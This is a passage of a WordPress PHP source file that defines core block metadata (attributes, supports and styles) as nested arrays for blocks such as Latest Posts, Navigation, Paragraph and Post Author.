'Rounded' ) ), 'editorStyle' => 'wp-block-image-editor', 'style' => 'wp-block-image', 'viewScript' => 'file:./view.min.js' ), 'latest-comments' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/latest-comments', 'title' => 'Latest Comments', 'category' => 'widgets', 'description' => 'Display a list of your most recent comments.', 'keywords' => array( 'recent comments' ), 'textdomain' => 'default', 'attributes' => array( 'commentsToShow' => array( 'type' => 'number', 'default' => 5, 'minimum' => 1, 'maximum' => 100 ), 'displayAvatar' => array( 'type' => 'boolean', 'default' => true ), 'displayDate' => array( 'type' => 'boolean', 'default' => true ), 'displayExcerpt' => array( 'type' => 'boolean', 'default' => true ) ), 'supports' => array( 'align' => true, 'html' => false, 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-latest-comments-editor', 'style' => 'wp-block-latest-comments' ), 'latest-posts' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/latest-posts', 'title' => 'Latest Posts', 'category' => 'widgets', 'description' => 'Display a list of your most recent posts.', 'keywords' => array( 'recent posts' ), 'textdomain' => 'default', 'attributes' => array( 'categories' => array( 'type' => 'array', 'items' => array( 'type' => 'object' ) ), 'selectedAuthor' => array( 'type' => 'number' ), 'postsToShow' => array( 'type' => 'number', 'default' => 5 ), 'displayPostContent' => array( 'type' => 'boolean', 'default' => false ), 'displayPostContentRadio' => array( 'type' => 'string', 'default' => 'excerpt' ), 'excerptLength' => array( 'type' => 'number', 'default' => 55 ), 'displayAuthor' => array( 'type' => 'boolean', 'default' => false ), 'displayPostDate' => array( 'type' => 'boolean', 'default' => false ), 'postLayout' => array( 'type' => 'string', 'default' => 'list' ), 'columns' => array( 'type' => 'number', 'default' => 3 ), 'order' => array( 'type' => 'string', 'default' => 'desc' ), 'orderBy' => array( 'type' => 'string', 'default' => 'date' ), 'displayFeaturedImage' => array( 'type' => 'boolean', 'default' => false ), 'featuredImageAlign' => array( 'type' => 'string', 'enum' => array( 'left', 'center', 'right' ) ), 'featuredImageSizeSlug' => array( 'type' => 'string', 'default' => 'thumbnail' ), 'featuredImageSizeWidth' => array( 'type' => 'number', 'default' => null ), 'featuredImageSizeHeight' => array( 'type' => 'number', 'default' => null ), 'addLinkToFeaturedImage' => array( 'type' => 'boolean', 'default' => false ) ), 'supports' => array( 'align' => true, 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-latest-posts-editor', 'style' => 'wp-block-latest-posts' ), 'legacy-widget' => array( 'apiVersion' => 3, 'name' => 'core/legacy-widget', 'title' => 'Legacy Widget', 'category' => 'widgets', 'description' => 'Display a legacy widget.', 'textdomain' => 'default', 'attributes' => array( 'id' => array( 'type' => 'string', 'default' => null ), 'idBase' => array( 'type' => 'string', 'default' => null ), 'instance' => array( 'type' => 'object', 'default' => null ) ), 'supports' => array( 'html' => false, 'customClassName' => false, 'reusable' => false ), 'editorStyle' => 'wp-block-legacy-widget-editor' ), 'list' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/list', 'title' => 'List', 'category' => 'text', 'description' => 'Create a bulleted or numbered list.', 'keywords' => array( 'bullet list', 'ordered list', 'numbered list' ), 'textdomain' => 'default', 'attributes' => array( 'ordered' => array( 'type' => 'boolean', 'default' => false, '__experimentalRole' => 'content' ), 'values' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'ol,ul', 'multiline' => 'li', '__unstableMultilineWrapperTags' => array( 'ol', 'ul' ), 'default' => '', '__experimentalRole' => 'content' ), 'type' => array( 'type' => 'string' ), 'start' => array( 'type' => 'number' ), 'reversed' => array( 'type' => 'boolean' ), 'placeholder' => array( 'type' => 'string' ) ), 'supports' => array( 'anchor' => true, 'className' => false, 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), '__unstablePasteTextInline' => true, '__experimentalSelector' => 'ol,ul', '__experimentalOnMerge' => true, '__experimentalSlashInserter' => true ), 'editorStyle' => 'wp-block-list-editor', 'style' => 'wp-block-list' ), 'list-item' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/list-item', 'title' => 'List item', 'category' => 'text', 'parent' => array( 'core/list' ), 'description' => 'Create a list item.', 'textdomain' => 'default', 'attributes' => array( 'placeholder' => array( 'type' => 'string' ), 'content' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'li', 'default' => '', '__experimentalRole' => 'content' ) ), 'supports' => array( 'className' => false, '__experimentalSelector' => 'li', 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'loginout' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/loginout', 'title' => 'Login/out', 'category' => 'theme', 'description' => 'Show login & logout links.', 'keywords' => array( 'login', 'logout', 'form' ), 'textdomain' => 'default', 'attributes' => array( 'displayLoginAsForm' => array( 'type' => 'boolean', 'default' => false ), 'redirectToCurrent' => array( 'type' => 'boolean', 'default' => true ) ), 'supports' => array( 'className' => true, 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'media-text' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/media-text', 'title' => 'Media & Text', 'category' => 'media', 'description' => 'Set media and words side-by-side for a richer layout.', 'keywords' => array( 'image', 'video' ), 'textdomain' => 'default', 'attributes' => array( 'align' => array( 'type' => 'string', 'default' => 'none' ), 'mediaAlt' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure img', 'attribute' => 'alt', 'default' => '', '__experimentalRole' => 'content' ), 'mediaPosition' => array( 'type' => 'string', 'default' => 'left' ), 'mediaId' => array( 'type' => 'number', '__experimentalRole' => 'content' ), 'mediaUrl' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure video,figure img', 'attribute' => 'src', '__experimentalRole' => 'content' ), 'mediaLink' => array( 'type' => 'string' ), 'linkDestination' => array( 'type' => 'string' ), 'linkTarget' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure a', 'attribute' => 'target' ), 'href' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure a', 'attribute' => 'href', '__experimentalRole' => 'content' ), 'rel' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure a', 'attribute' => 'rel' ), 'linkClass' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'figure a', 'attribute' => 'class' ), 'mediaType' => array( 'type' => 'string', '__experimentalRole' => 'content' ), 'mediaWidth' => array( 'type' => 'number', 'default' => 50 ), 'mediaSizeSlug' => array( 'type' => 'string' ), 'isStackedOnMobile' => array( 'type' => 'boolean', 'default' => true ), 'verticalAlignment' => array( 'type' => 'string' ), 'imageFill' => array( 'type' => 'boolean' ), 'focalPoint' => array( 'type' => 'object' ), 'allowedBlocks' => array( 'type' => 'array' ) ), 'supports' => array( 'anchor' => true, 'align' => array( 'wide', 'full' ), 'html' => false, 'color' => array( 'gradients' => true, 'heading' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-media-text-editor', 'style' => 'wp-block-media-text' ), 'missing' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/missing', 'title' => 'Unsupported', 'category' => 'text', 'description' => 'Your site doesn’t include support for this block.', 'textdomain' => 'default', 'attributes' => array( 'originalName' => array( 'type' => 'string' ), 'originalUndelimitedContent' => array( 'type' => 'string' ), 'originalContent' => array( 'type' => 'string', 'source' => 'html' ) ), 'supports' => array( 'className' => false, 'customClassName' => false, 'inserter' => false, 'html' => false, 'reusable' => false ) ), 'more' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/more', 'title' => 'More', 'category' => 'design', 'description' => 'Content before this block will be shown in the excerpt on your archives page.', 'keywords' => array( 'read more' ), 'textdomain' => 'default', 'attributes' => array( 'customText' => array( 'type' => 'string' ), 'noTeaser' => array( 'type' => 'boolean', 'default' => false ) ), 'supports' => array( 'customClassName' => false, 'className' => false, 'html' => false, 'multiple' => false ), 'editorStyle' => 'wp-block-more-editor' ), 'navigation' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/navigation', 'title' => 'Navigation', 'category' => 'theme', 'description' => 'A collection of blocks that allow visitors to get around your site.', 'keywords' => array( 'menu', 'navigation', 'links' ), 'textdomain' => 'default', 'attributes' => array( 'ref' => array( 'type' => 'number' ), 'textColor' => array( 'type' => 'string' ), 'customTextColor' => array( 'type' => 'string' ), 'rgbTextColor' => array( 'type' => 'string' ), 'backgroundColor' => array( 'type' => 'string' ), 'customBackgroundColor' => array( 'type' => 'string' ), 'rgbBackgroundColor' => array( 'type' => 'string' ), 'showSubmenuIcon' => array( 'type' => 'boolean', 'default' => true ), 'openSubmenusOnClick' => array( 'type' => 'boolean', 'default' => false ), 'overlayMenu' => array( 'type' => 'string', 'default' => 'mobile' ), 'icon' => array( 'type' => 'string', 'default' => 'handle' ), 'hasIcon' => array( 'type' => 'boolean', 'default' => true ), '__unstableLocation' => array( 'type' => 'string' ), 'overlayBackgroundColor' => array( 'type' => 'string' ), 'customOverlayBackgroundColor' => array( 'type' => 'string' ), 'overlayTextColor' => array( 'type' => 'string' ), 'customOverlayTextColor' => array( 'type' => 'string' ), 'maxNestingLevel' => array( 'type' => 'number', 'default' => 5 ), 'templateLock' => array( 'type' => array( 'string', 'boolean' ), 'enum' => array( 'all', 'insert', 'contentOnly', false ) ) ), 'providesContext' => array( 'textColor' => 'textColor', 'customTextColor' => 'customTextColor', 'backgroundColor' => 'backgroundColor', 'customBackgroundColor' => 'customBackgroundColor', 'overlayTextColor' => 'overlayTextColor', 'customOverlayTextColor' => 'customOverlayTextColor', 'overlayBackgroundColor' => 'overlayBackgroundColor', 'customOverlayBackgroundColor' => 'customOverlayBackgroundColor', 'fontSize' => 'fontSize', 'customFontSize' => 'customFontSize', 'showSubmenuIcon' => 'showSubmenuIcon', 'openSubmenusOnClick' => 'openSubmenusOnClick', 'style' => 'style', 'maxNestingLevel' => 'maxNestingLevel' ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'ariaLabel' => true, 'html' => false, 'inserter' => true, 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalTextTransform' => true, '__experimentalFontFamily' => true, '__experimentalLetterSpacing' => true, '__experimentalTextDecoration' => true, '__experimentalSkipSerialization' => array( 'textDecoration' ), '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'spacing' => array( 'blockGap' => true, 'units' => array( 'px', 'em', 'rem', 'vh', 'vw' ), '__experimentalDefaultControls' => array( 'blockGap' => true ) ), 'layout' => array( 'allowSwitching' => false, 'allowInheriting' => false, 'allowVerticalAlignment' => false, 'allowSizingOnChildren' => true, 'default' => array( 'type' => 'flex' ) ), '__experimentalStyle' => array( 'elements' => array( 'link' => array( 'color' => array( 'text' => 'inherit' ) ) ) ), 'interactivity' => true ), 'viewScript' => 'file:./view.min.js', 'editorStyle' => 'wp-block-navigation-editor', 'style' => 'wp-block-navigation' ), 'navigation-link' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/navigation-link', 'title' => 'Custom Link', 'category' => 'design', 'parent' => array( 'core/navigation' ), 'description' => 'Add a page, link, or another item to your navigation.', 'textdomain' => 'default', 'attributes' => array( 'label' => array( 'type' => 'string' ), 'type' => array( 'type' => 'string' ), 'description' => array( 'type' => 'string' ), 'rel' => array( 'type' => 'string' ), 'id' => array( 'type' => 'number' ), 'opensInNewTab' => array( 'type' => 'boolean', 'default' => false ), 'url' => array( 'type' => 'string' ), 'title' => array( 'type' => 'string' ), 'kind' => array( 'type' => 'string' ), 'isTopLevelLink' => array( 'type' => 'boolean' ) ), 'usesContext' => array( 'textColor', 'customTextColor', 'backgroundColor', 'customBackgroundColor', 'overlayTextColor', 'customOverlayTextColor', 'overlayBackgroundColor', 'customOverlayBackgroundColor', 'fontSize', 'customFontSize', 'showSubmenuIcon', 'maxNestingLevel', 'style' ), 'supports' => array( 'reusable' => false, 'html' => false, '__experimentalSlashInserter' => true, 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-navigation-link-editor', 'style' => 'wp-block-navigation-link' ), 'navigation-submenu' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/navigation-submenu', 'title' => 'Submenu', 'category' => 'design', 'parent' => array( 'core/navigation' ), 'description' => 'Add a submenu to your navigation.', 'textdomain' => 'default', 'attributes' => array( 'label' => array( 'type' => 'string' ), 'type' => array( 'type' => 'string' ), 'description' => array( 'type' => 'string' ), 'rel' => array( 'type' => 'string' ), 'id' => array( 'type' => 'number' ), 'opensInNewTab' => array( 'type' => 'boolean', 'default' => false ), 'url' => array( 'type' => 'string' ), 'title' => array( 'type' => 'string' ), 'kind' => array( 'type' => 'string' ), 'isTopLevelItem' => array( 'type' => 'boolean' ) ), 'usesContext' => array( 'textColor', 'customTextColor', 'backgroundColor', 'customBackgroundColor', 'overlayTextColor', 'customOverlayTextColor', 'overlayBackgroundColor', 'customOverlayBackgroundColor', 'fontSize', 'customFontSize', 'showSubmenuIcon', 'maxNestingLevel', 'openSubmenusOnClick', 'style' ), 'supports' => array( 'reusable' => false, 'html' => false ), 'editorStyle' => 'wp-block-navigation-submenu-editor', 'style' => 'wp-block-navigation-submenu' ), 'nextpage' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/nextpage', 'title' => 'Page Break', 'category' => 'design', 'description' => 'Separate your content into a multi-page experience.', 'keywords' => array( 'next page', 'pagination' ), 'parent' => array( 'core/post-content' ), 'textdomain' => 'default', 'supports' => array( 'customClassName' => false, 'className' => false, 'html' => false ), 'editorStyle' => 'wp-block-nextpage-editor' ), 'page-list' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/page-list', 'title' => 'Page List', 'category' => 'widgets', 'description' => 'Display a list of all pages.', 'keywords' => array( 'menu', 'navigation' ), 'textdomain' => 'default', 'attributes' => array( 'parentPageID' => array( 'type' => 'integer', 'default' => 0 ), 'isNested' => array( 'type' => 'boolean', 'default' => false ) ), 'usesContext' => array( 'textColor', 'customTextColor', 'backgroundColor', 'customBackgroundColor', 'overlayTextColor', 'customOverlayTextColor', 'overlayBackgroundColor', 'customOverlayBackgroundColor', 'fontSize', 'customFontSize', 'showSubmenuIcon', 'style', 'openSubmenusOnClick' ), 'supports' => array( 'reusable' => false, 'html' => false, 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-page-list-editor', 'style' => 'wp-block-page-list' ), 'page-list-item' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/page-list-item', 'title' => 'Page List Item', 'category' => 'widgets', 'parent' => array( 'core/page-list' ), 'description' => 'Displays a page inside a list of all pages.', 'keywords' => array( 'page', 'menu', 'navigation' ), 'textdomain' => 'default', 'attributes' => array( 'id' => array( 'type' => 'number' ), 'label' => array( 'type' => 'string' ), 'title' => array( 'type' => 'string' ), 'link' => array( 'type' => 'string' ), 'hasChildren' => array( 'type' => 'boolean' ) ), 'usesContext' => array( 'textColor', 'customTextColor', 'backgroundColor', 'customBackgroundColor', 'overlayTextColor', 'customOverlayTextColor', 'overlayBackgroundColor', 'customOverlayBackgroundColor', 'fontSize', 'customFontSize', 'showSubmenuIcon', 'style', 'openSubmenusOnClick' ), 'supports' => array( 'reusable' => false, 'html' => false, 'lock' => false, 'inserter' => false, '__experimentalToolbar' => false ), 'editorStyle' => 'wp-block-page-list-editor', 'style' => 'wp-block-page-list' ), 'paragraph' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/paragraph', 'title' => 'Paragraph', 'category' => 'text', 'description' => 'Start with the basic building block of all narrative.', 'keywords' => array( 'text' ), 'textdomain' => 'default', 'usesContext' => array( 'postId' ), 'attributes' => array( 'align' => array( 'type' => 'string' ), 'content' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'p', 'default' => '', '__experimentalRole' => 'content' ), 'dropCap' => array( 'type' => 'boolean', 'default' => false ), 'placeholder' => array( 'type' => 'string' ), 'direction' => array( 'type' => 'string', 'enum' => array( 'ltr', 'rtl' ) ) ), 'supports' => array( 'anchor' => true, 'className' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), '__experimentalConnections' => true, 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalTextDecoration' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalTextTransform' => true, '__experimentalWritingMode' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), '__experimentalSelector' => 'p', '__unstablePasteTextInline' => true ), 'editorStyle' => 'wp-block-paragraph-editor', 'style' => 'wp-block-paragraph' ), 'pattern' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/pattern', 'title' => 'Pattern placeholder', 'category' => 'theme', 'description' => 'Show a block pattern.', 'supports' => array( 'html' => false, 'inserter' => false ), 'textdomain' => 'default', 'attributes' => array( 'slug' => array( 'type' => 'string' ) ) ), 'post-author' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-author', 'title' => 'Author', 'category' => 'theme', 'description' => 'Display post author details such as name, avatar, and bio.', 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ), 'avatarSize' => array( 'type' => 'number', 'default' => 48 ), 'showAvatar' => array( 'type' => 'boolean', 'default' => true ), 'showBio' => array( 'type' => 'boolean' ), 'byline' => array( 'type' => 'string' ), 'isLink' => array( 'type' => 'boolean', 'default' => false ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ) ), 'usesContext' => array( 'postType', 'postId', 'queryId' ), 'supports' => array( 'html' => false, 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDuotone' => '.wp-block-post-author__avatar img', '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ) ), 'style' => 'wp-block-post-author' ), 'post-author-biography' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-author-biography', 'title' => 'Author Biography', 'category' => 'theme', 'description' => 'The author biography.', 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ) ), 'usesContext' => array( 'postType', 'postId' ), 'supports' => array( 'spacing' => array( 'margin' => true, 'padding' => true ), 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'post-author-name' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-author-name', 'title' => 'Author Name', 'category' => 'theme', 'description' => 'The author name.', 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ), 'isLink' => array( 'type' => 'boolean', 'default' => false ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ) ), 'usesContext' => array( 'postType', 'postId' ), 'supports' => array( 'html' => false, 'spacing' => array( 'margin' => true, 'padding' => true ), 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'post-comments-form' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-comments-form', 'title' => 'Comments Form', 'category' => 'theme', 'description' => 'Display a post\'s comments form.', 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ) ), 'usesContext' => array( 'postId', 'postType' ), 'supports' => array( 'html' => false, 'color' => array( 'gradients' => true, 'heading' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalTextTransform' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-post-comments-form-editor', 'style' => array( 'wp-block-post-comments-form', 'wp-block-buttons', 'wp-block-button' ) ), 'post-content' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-content', 'title' => 'Content', 'category' => 'theme', 'description' => 'Displays the contents of a post or page.', 'textdomain' => 'default', 'usesContext' => array( 'postId', 'postType', 'queryId' ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'html' => false, 'layout' => true, 'dimensions' => array( 'minHeight' => true ), 'spacing' => array( 'blockGap' => true ), 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => false, 'text' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-post-content-editor' ), 'post-date' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-date', 'title' => 'Date', 'category' => 'theme', 'description' => 'Display the publish date for an entry such as a post or page.', 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ), 'format' => array( 'type' => 'string' ), 'isLink' => array( 'type' => 'boolean', 'default' => false ), 'displayType' => array( 'type' => 'string', 'default' => 'date' ) ), 'usesContext' => array( 'postId', 'postType', 'queryId' ), 'supports' => array( 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'post-excerpt' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-excerpt', 'title' => 'Excerpt', 'category' => 'theme', 'description' => 'Display the excerpt.', 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ), 'moreText' => array( 'type' => 'string' ), 'showMoreOnNewLine' => array( 'type' => 'boolean', 'default' => true ), 'excerptLength' => array( 'type' => 'number', 'default' => 55 ) ), 'usesContext' => array( 'postId', 'postType', 'queryId' ), 'supports' => array( 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-post-excerpt-editor', 'style' => 'wp-block-post-excerpt' ), 'post-featured-image' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-featured-image', 'title' => 'Featured Image', 'category' => 'theme', 'description' => 'Display a post\'s featured image.', 'textdomain' => 'default', 'attributes' => array( 'isLink' => array( 'type' => 'boolean', 'default' => false ), 'aspectRatio' => array( 'type' => 'string' ), 'width' => array( 'type' => 'string' ), 'height' => array( 'type' => 'string' ), 'scale' => array( 'type' => 'string', 'default' => 'cover' ), 'sizeSlug' => array( 'type' => 'string' ), 'rel' => array( 'type' => 'string', 'attribute' => 'rel', 'default' => '' ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ), 'overlayColor' => array( 'type' => 'string' ), 'customOverlayColor' => array( 'type' => 'string' ), 'dimRatio' => array( 'type' => 'number', 'default' => 0 ), 'gradient' => array( 'type' => 'string' ), 'customGradient' => array( 'type' => 'string' ) ), 'usesContext' => array( 'postId', 'postType', 'queryId' ), 'supports' => array( 'align' => array( 'left', 'right', 'center', 'wide', 'full' ), 'color' => array( '__experimentalDuotone' => 'img, .wp-block-post-featured-image__placeholder, .components-placeholder__illustration, .components-placeholder::before', 'text' => false, 'background' => false ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'width' => true, '__experimentalSelector' => 'img, .block-editor-media-placeholder, .wp-block-post-featured-image__overlay', '__experimentalSkipSerialization' => true, '__experimentalDefaultControls' => array( 'color' => true, 'radius' => true, 'width' => true ) ), 'html' => false, 'spacing' => array( 'margin' => true, 'padding' => true ) ), 'editorStyle' => 'wp-block-post-featured-image-editor', 'style' => 'wp-block-post-featured-image' ), 'post-navigation-link' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-navigation-link', 'title' => 'Post Navigation Link', 'category' => 'theme', 'description' => 'Displays the next or previous post link that is adjacent to the current post.', 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ), 'type' => array( 'type' => 'string', 'default' => 'next' ), 'label' => array( 'type' => 'string' ), 'showTitle' => array( 'type' => 'boolean', 'default' => false ), 'linkLabel' => array( 'type' => 'boolean', 'default' => false ), 'arrow' => array( 'type' => 'string', 'default' => 'none' ) ), 'supports' => array( 'reusable' => false, 'html' => false, 'color' => array( 'link' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, 